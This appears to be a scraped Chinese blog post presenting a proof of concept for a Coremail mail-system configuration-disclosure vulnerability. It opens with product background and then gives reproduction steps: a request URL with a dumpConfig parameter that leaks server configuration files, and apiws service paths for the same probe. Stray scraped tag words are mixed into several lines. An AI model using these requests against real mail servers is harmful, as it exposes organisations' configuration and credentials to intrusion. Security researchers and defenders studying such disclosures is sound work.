Coremail接口存配置讀取漏洞POC

Coremail產品誕生於1999年,通過二十多年發展,現在從億萬級別的運營系統,到幾萬人的大型企業,都有了Coremail的客戶。api

截止2019年,Coremail郵件系統產品在國內已擁有10億終端用戶  ,是目前國內擁有郵箱使用用戶最多的郵件系統。Coremail今天不但爲網易(12六、16三、yeah)、移動,聯通等知名運營商提供電子郵件總體技術解決方案及企業郵局運營服務,還爲石油、鋼鐵、電力、政府、金融、教育、尖端製造企業等用戶提供郵件系統軟件和反垃圾服務。瀏覽器

 

 

復現手法app

1.mailsmsblog

瀏覽器訪問  http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/rem

出現一些配置文件信息 證實存在該漏洞產品

出現404或者頁面空白 則證實漏洞不存在class

 

2.apiwsemail

http://host/apiws/services/軟件

http://host/./apiws/services/配置

 

 

相關文章
相關標籤/搜索